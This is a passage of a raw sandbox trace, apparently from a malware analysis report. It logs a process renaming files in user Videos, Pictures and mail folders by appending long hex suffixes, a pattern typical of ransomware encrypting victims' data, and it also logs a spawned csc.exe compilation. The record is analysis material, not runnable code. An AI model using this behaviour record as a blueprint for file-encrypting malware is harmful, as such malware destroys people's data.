lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\kTlgx2Q.mp4", lpString2=".7339E39611B19A7291E6578001EEBDE89A91A1732BA9043A70F32D4657BE676E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\kTlgx2Q.mp4.7339E39611B19A7291E6578001EEBDE89A91A1732BA9043A70F32D4657BE676E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\kTlgx2Q.mp4.7339E39611B19A7291E6578001EEBDE89A91A1732BA9043A70F32D4657BE676E" [0169.205] GetProcessHeap () returned 0x270000 [0169.205] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x150) returned 0x7733488 [0169.205] NtSetInformationFile (FileHandle=0x5ec, IoStatusBlock=0x73dfc44, FileInformation=0x7733488, Length=0x150, FileInformationClass=0xa) returned 0x0 [0169.207] CloseHandle (hObject=0x5ec) returned 1 [0169.209] GetProcessHeap () returned 0x270000 [0169.210] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7849818 | out: hHeap=0x270000) returned 1 [0169.211] RtlInterlockedCompareExchange64 () returned 0x8 [0169.211] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.211] NtQueryObject (in: Handle=0x5f0, ObjectInformationClass=0x1, ObjectInformation=0x7871a20, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x7871a20, ReturnLength=0x73dfc54) returned 0x0 [0169.213] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\l_JxA.mp4", lpString2=".319B31D0CFAF1FCD55016EBF52679F50EC9E7246290C2B1781097394DDCC3D02" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs 
HM\\l_JxA.mp4.319B31D0CFAF1FCD55016EBF52679F50EC9E7246290C2B1781097394DDCC3D02") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\l_JxA.mp4.319B31D0CFAF1FCD55016EBF52679F50EC9E7246290C2B1781097394DDCC3D02" [0169.213] GetProcessHeap () returned 0x270000 [0169.213] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x14c) returned 0x77335e0 [0169.213] NtSetInformationFile (FileHandle=0x5f0, IoStatusBlock=0x73dfc44, FileInformation=0x77335e0, Length=0x14c, FileInformationClass=0xa) returned 0x0 [0169.215] CloseHandle (hObject=0x5f0) returned 1 [0169.216] GetProcessHeap () returned 0x270000 [0169.218] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7871970 | out: hHeap=0x270000) returned 1 [0169.218] RtlInterlockedCompareExchange64 () returned 0x7 [0169.218] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.218] NtQueryObject (in: Handle=0x5f4, ObjectInformationClass=0x1, ObjectInformation=0x7899b78, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x7899b78, ReturnLength=0x73dfc54) returned 0x0 [0169.219] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\wPVx.mp4", lpString2=".0BF17413A5591BC937ED56F04D64749E9E2D94C4E2879C29DEB7EC9B4DFFE825" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\wPVx.mp4.0BF17413A5591BC937ED56F04D64749E9E2D94C4E2879C29DEB7EC9B4DFFE825") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\wPVx.mp4.0BF17413A5591BC937ED56F04D64749E9E2D94C4E2879C29DEB7EC9B4DFFE825" [0169.219] GetProcessHeap () returned 0x270000 [0169.219] RtlAllocateHeap (HeapHandle=0x270000, 
Flags=0x8, Size=0x14a) returned 0x7733738 [0169.219] NtSetInformationFile (FileHandle=0x5f4, IoStatusBlock=0x73dfc44, FileInformation=0x7733738, Length=0x14a, FileInformationClass=0xa) returned 0x0 [0169.221] CloseHandle (hObject=0x5f4) returned 1 [0169.222] GetProcessHeap () returned 0x270000 [0169.224] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7899ac8 | out: hHeap=0x270000) returned 1 [0169.231] RtlInterlockedCompareExchange64 () returned 0x6 [0169.231] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.231] NtQueryObject (in: Handle=0x5b4, ObjectInformationClass=0x1, ObjectInformation=0x78c1cd0, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x78c1cd0, ReturnLength=0x73dfc54) returned 0x0 [0169.232] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Z_cuynB3ZGeFf6DVUXD.avi", lpString2=".97CB9D940B706AC5139EF0405B14168A79A23184A2370D5B4805850CA5B6DB39" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Z_cuynB3ZGeFf6DVUXD.avi.97CB9D940B706AC5139EF0405B14168A79A23184A2370D5B4805850CA5B6DB39") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Z_cuynB3ZGeFf6DVUXD.avi.97CB9D940B706AC5139EF0405B14168A79A23184A2370D5B4805850CA5B6DB39" [0169.232] GetProcessHeap () returned 0x270000 [0169.233] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x14c) returned 0x7733890 [0169.233] NtSetInformationFile (FileHandle=0x5b4, IoStatusBlock=0x73dfc44, FileInformation=0x7733890, Length=0x14c, FileInformationClass=0xa) returned 0x0 [0169.235] CloseHandle (hObject=0x5b4) returned 1 [0169.235] GetProcessHeap () returned 0x270000 [0169.238] HeapFree (in: hHeap=0x270000, dwFlags=0x0, 
lpMem=0x78c1c20 | out: hHeap=0x270000) returned 1 [0169.240] RtlInterlockedCompareExchange64 () returned 0x5 [0169.240] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.240] NtQueryObject (in: Handle=0x5d8, ObjectInformationClass=0x1, ObjectInformation=0x78e9e28, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x78e9e28, ReturnLength=0x73dfc54) returned 0x0 [0169.242] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\X4ny7HQWCG093Ih87.flv", lpString2=".0C50DBCC759ECD3D2C6A46200D5B9684048D429226AAB207C37EA6E52D80366A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\X4ny7HQWCG093Ih87.flv.0C50DBCC759ECD3D2C6A46200D5B9684048D429226AAB207C37EA6E52D80366A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\X4ny7HQWCG093Ih87.flv.0C50DBCC759ECD3D2C6A46200D5B9684048D429226AAB207C37EA6E52D80366A" [0169.242] GetProcessHeap () returned 0x270000 [0169.242] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11e) returned 0x43342d8 [0169.242] NtSetInformationFile (FileHandle=0x5d8, IoStatusBlock=0x73dfc44, FileInformation=0x43342d8, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0169.248] CloseHandle (hObject=0x5d8) returned 1 [0169.249] GetProcessHeap () returned 0x270000 [0169.252] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x78e9d78 | out: hHeap=0x270000) returned 1 [0169.255] RtlInterlockedCompareExchange64 () returned 0x4 [0169.255] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.255] NtQueryObject (in: 
Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x73e00f8, ReturnLength=0x73dfc54) returned 0x0 [0169.258] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\oeut8R74cBHG7k.png", lpString2=".0FCE614293BD42CF0405AC59CF805059570EE9C47A2265332E920D97B75C654D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\oeut8R74cBHG7k.png.0FCE614293BD42CF0405AC59CF805059570EE9C47A2265332E920D97B75C654D") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\oeut8R74cBHG7k.png.0FCE614293BD42CF0405AC59CF805059570EE9C47A2265332E920D97B75C654D" [0169.258] GetProcessHeap () returned 0x270000 [0169.258] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12c) returned 0x4333070 [0169.258] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x73dfc44, FileInformation=0x4333070, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0169.261] CloseHandle (hObject=0x598) returned 1 [0169.263] GetProcessHeap () returned 0x270000 [0169.265] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.270] RtlInterlockedCompareExchange64 () returned 0x3 [0169.270] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.271] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x74723c8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x74723c8, ReturnLength=0x73dfc54) returned 0x0 [0169.272] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\cBIayRuO2o1rUi4dxeN.flv", 
lpString2=".21B7A786E172AD0683EE6C3DC7701FCF88D2D052874541A1286A9E7BF5649269" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\cBIayRuO2o1rUi4dxeN.flv.21B7A786E172AD0683EE6C3DC7701FCF88D2D052874541A1286A9E7BF5649269") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\cBIayRuO2o1rUi4dxeN.flv.21B7A786E172AD0683EE6C3DC7701FCF88D2D052874541A1286A9E7BF5649269" [0169.272] GetProcessHeap () returned 0x270000 [0169.272] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x13c) returned 0x7418828 [0169.272] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x73dfc44, FileInformation=0x7418828, Length=0x13c, FileInformationClass=0xa) returned 0x0 [0169.274] CloseHandle (hObject=0x58c) returned 1 [0169.275] GetProcessHeap () returned 0x270000 [0169.276] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7472318 | out: hHeap=0x270000) returned 1 [0169.276] RtlInterlockedCompareExchange64 () returned 0x2 [0169.276] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.279] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x750a500, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x750a500, ReturnLength=0x73dfc54) returned 0x0 [0169.280] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\pVn3Tay0r5Q-vO94zaW.flv", lpString2=".C18D313ACF5D6E286A6067686E82A13E6E578674B9D57E4C0E90121424A3BA5D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\pVn3Tay0r5Q-vO94zaW.flv.C18D313ACF5D6E286A6067686E82A13E6E578674B9D57E4C0E90121424A3BA5D") 
returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\pVn3Tay0r5Q-vO94zaW.flv.C18D313ACF5D6E286A6067686E82A13E6E578674B9D57E4C0E90121424A3BA5D" [0169.280] GetProcessHeap () returned 0x270000 [0169.280] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x178) returned 0x427b630 [0169.280] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x73dfc44, FileInformation=0x427b630, Length=0x178, FileInformationClass=0xa) returned 0x0 [0169.282] CloseHandle (hObject=0x594) returned 1 [0169.282] GetProcessHeap () returned 0x270000 [0169.284] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x750a450 | out: hHeap=0x270000) returned 1 [0169.286] RtlInterlockedCompareExchange64 () returned 0x2 [0169.286] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.296] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x74c20b8, ReturnLength=0x73dfc54) returned 0x0 [0169.298] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\I6ptmqC.gif", lpString2=".3C744E04E9AD412AC5F17CC29BC14F4F2D02092BC91C14C7CF223A4A170ED56F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\I6ptmqC.gif.3C744E04E9AD412AC5F17CC29BC14F4F2D02092BC91C14C7CF223A4A170ED56F") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\I6ptmqC.gif.3C744E04E9AD412AC5F17CC29BC14F4F2D02092BC91C14C7CF223A4A170ED56F" [0169.298] GetProcessHeap () returned 0x270000 [0169.298] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10e) returned 0x4267eb8 [0169.298] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x73dfc44, FileInformation=0x4267eb8, 
Length=0x10e, FileInformationClass=0xa) returned 0x0 [0169.300] CloseHandle (hObject=0x590) returned 1 [0169.301] GetProcessHeap () returned 0x270000 [0169.303] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0169.316] RtlInterlockedCompareExchange64 () returned 0x0 [0169.316] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0170.827] ReadFile (in: hFile=0x594, lpBuffer=0x77292e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x77091a8 | out: lpBuffer=0x77292e0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x77091a8) returned 1 [0170.827] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0170.827] NtQueryObject (in: Handle=0x5b4, ObjectInformationClass=0x1, ObjectInformation=0x7821210, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x7821210, ReturnLength=0x73dfc54) returned 0x0 [0170.829] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg", lpString2=".FB00FF4D1BB6C96F9569AEDA1C6AB0D005FCC4033416FAC37A0DACFEE71D697E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.FB00FF4D1BB6C96F9569AEDA1C6AB0D005FCC4033416FAC37A0DACFEE71D697E") returned="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.FB00FF4D1BB6C96F9569AEDA1C6AB0D005FCC4033416FAC37A0DACFEE71D697E" [0170.829] GetProcessHeap () returned 
0x270000 [0170.829] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x160) returned 0x77339e8 [0170.829] NtSetInformationFile (FileHandle=0x5b4, IoStatusBlock=0x73dfc44, FileInformation=0x77339e8, Length=0x160, FileInformationClass=0xa) returned 0x0 [0170.832] CloseHandle (hObject=0x5b4) returned 1 [0170.833] GetProcessHeap () returned 0x270000 [0170.834] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7821160 | out: hHeap=0x270000) returned 1 [0170.834] RtlInterlockedCompareExchange64 () returned 0x4 [0170.834] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0170.834] NtQueryObject (in: Handle=0x5f4, ObjectInformationClass=0x1, ObjectInformation=0x7849368, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x7849368, ReturnLength=0x73dfc54) returned 0x0 [0170.836] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg", lpString2=".AA0ABDBC58C7F37C75BD84BFFD1140FC24E74225AF294C6B4F3925E5764BCB20" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.AA0ABDBC58C7F37C75BD84BFFD1140FC24E74225AF294C6B4F3925E5764BCB20") returned="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.AA0ABDBC58C7F37C75BD84BFFD1140FC24E74225AF294C6B4F3925E5764BCB20" [0170.836] GetProcessHeap () returned 0x270000 [0170.836] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x158) returned 0x35bfb0 [0170.836] NtSetInformationFile (FileHandle=0x5f4, IoStatusBlock=0x73dfc44, FileInformation=0x35bfb0, Length=0x158, FileInformationClass=0xa) returned 0x0 [0170.838] CloseHandle (hObject=0x5f4) returned 1 [0170.839] 
GetProcessHeap () returned 0x270000 [0170.840] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x78492b8 | out: hHeap=0x270000) returned 1 [0170.851] RtlInterlockedCompareExchange64 () returned 0x3 [0170.851] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0170.851] NtQueryObject (in: Handle=0x5f0, ObjectInformationClass=0x1, ObjectInformation=0x78714c0, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x78714c0, ReturnLength=0x73dfc54) returned 0x0 [0170.852] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg", lpString2=".EC67870BE36E0F273A9068FD8E461379CFD96C3C4A75CF1AB9A8191129BA8D0D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.EC67870BE36E0F273A9068FD8E461379CFD96C3C4A75CF1AB9A8191129BA8D0D") returned="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.EC67870BE36E0F273A9068FD8E461379CFD96C3C4A75CF1AB9A8191129BA8D0D" [0170.852] GetProcessHeap () returned 0x270000 [0170.853] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x152) returned 0x35c118 [0170.853] NtSetInformationFile (FileHandle=0x5f0, IoStatusBlock=0x73dfc44, FileInformation=0x35c118, Length=0x152, FileInformationClass=0xa) returned 0x0 [0170.854] CloseHandle (hObject=0x5f0) returned 1 [0170.877] GetProcessHeap () returned 0x270000 [0170.878] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7871410 | out: hHeap=0x270000) returned 1 [0170.902] RtlInterlockedCompareExchange64 () returned 0x1 [0170.902] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, 
lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0170.905] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x78c10b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x78c10b8, ReturnLength=0x73dfc54) returned 0x0 [0170.906] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log", lpString2=".23FF2278379EB989E1C94ABD0766001DDA671D57CE91789ED4BBA1B2B179CB35" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log.23FF2278379EB989E1C94ABD0766001DDA671D57CE91789ED4BBA1B2B179CB35") returned="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log.23FF2278379EB989E1C94ABD0766001DDA671D57CE91789ED4BBA1B2B179CB35" [0170.907] GetProcessHeap () returned 0x270000 [0170.907] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x142) returned 0x4258978 [0170.907] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x73dfc44, FileInformation=0x4258978, Length=0x142, FileInformationClass=0xa) returned 0x0 [0170.909] CloseHandle (hObject=0x5b0) returned 1 [0170.910] GetProcessHeap () returned 0x270000 [0170.912] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x78c1008 | out: hHeap=0x270000) returned 1 [0170.912] RtlInterlockedCompareExchange64 () returned 0x0 [0170.912] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0171.816] WriteFile (in: hFile=0x604, lpBuffer=0x7701188*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76e1050 | out: lpBuffer=0x7701188*, lpNumberOfBytesWritten=0x0, 
lpOverlapped=0x76e1050) returned 1 [0171.834] RtlInterlockedCompareExchange64 () returned 0x4 [0171.834] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0172.032] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x78c10b8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x78c10b8, ReturnLength=0x73dfc54) returned 0x0 [0172.033] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpString2=".533A448C3890A9C9046073548251B78B5146F7ABEE7D82E37A2043A16CF1AB69" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.533A448C3890A9C9046073548251B78B5146F7ABEE7D82E37A2043A16CF1AB69") returned="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.533A448C3890A9C9046073548251B78B5146F7ABEE7D82E37A2043A16CF1AB69" [0172.033] GetProcessHeap () returned 0x270000 [0172.033] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x124) returned 0x43338f8 [0172.033] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x73dfc44, FileInformation=0x43338f8, Length=0x124, FileInformationClass=0xa) returned 0x0 [0172.136] CloseHandle (hObject=0x590) returned 1 [0172.138] GetProcessHeap () returned 0x270000 [0172.139] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x78c1008 | out: hHeap=0x270000) returned 1 [0172.141] RtlInterlockedCompareExchange64 () returned 0x3 [0172.141] GetQueuedCompletionStatus (CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff) Thread: id = 112 os_tid = 0xdb4 Thread: id = 113 os_tid = 0xdac Process: id = "2" image_name = "csc.exe" filename = 
"c:\\windows\\microsoft.net\\framework\\v4.0.30319\\csc.exe" page_root = "0x7ef47c60" os_pid = "0x94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xfac" cmd_line = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\bx213pkj.cmdline\"" cur_dir = "C:\\Windows\\system32\\" os_username = "MYB7ZA2AF\\5AlR3U30D3" bitness = "32" os_groups = "MYB7ZA2AF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e73d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 595 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 596 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 597 start_va = 